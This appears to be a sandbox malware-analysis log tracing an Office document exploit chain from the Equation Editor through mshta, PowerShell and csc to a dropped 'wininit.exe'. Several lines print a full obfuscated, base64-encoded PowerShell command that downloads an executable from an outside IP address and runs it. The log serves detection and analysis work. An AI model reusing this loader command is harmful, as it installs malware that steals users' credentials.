Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: ucrtbase.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\wininit.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\verclsid.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\verclsid.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\verclsid.exe	Section loaded: rpcrtremote.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: PO-000041492.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\PO-000041492.docx.doc

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO-000041492.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: 4.466364_2401 PACKING LIST.xlsx.0.dr	Initial sample: OLE zip file path = xl/media/image2.png
Source: 4.466364_2401 PACKING LIST.xlsx.0.dr	Initial sample: OLE zip file path = xl/media/image1.png
Source: 4.466364_2401 PACKING LIST.xlsx.0.dr	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: PO-000041492.docx.doc

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs	.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"			Jump to behavior

Yara detected aPLib compressed binary

Source: Yara match	File source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 18_2_00402AC0 push eax; ret		18_2_00402AD4
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 18_2_00402AC0 push eax; ret		18_2_00402AFC

Source: caspol[1].exe.10.dr	Static PE information: section name: .text entropy: 7.9227520273220895
Source: wininit.exe.10.dr	Static PE information: section name: .text entropy: 7.9227520273220895

Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs	High entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
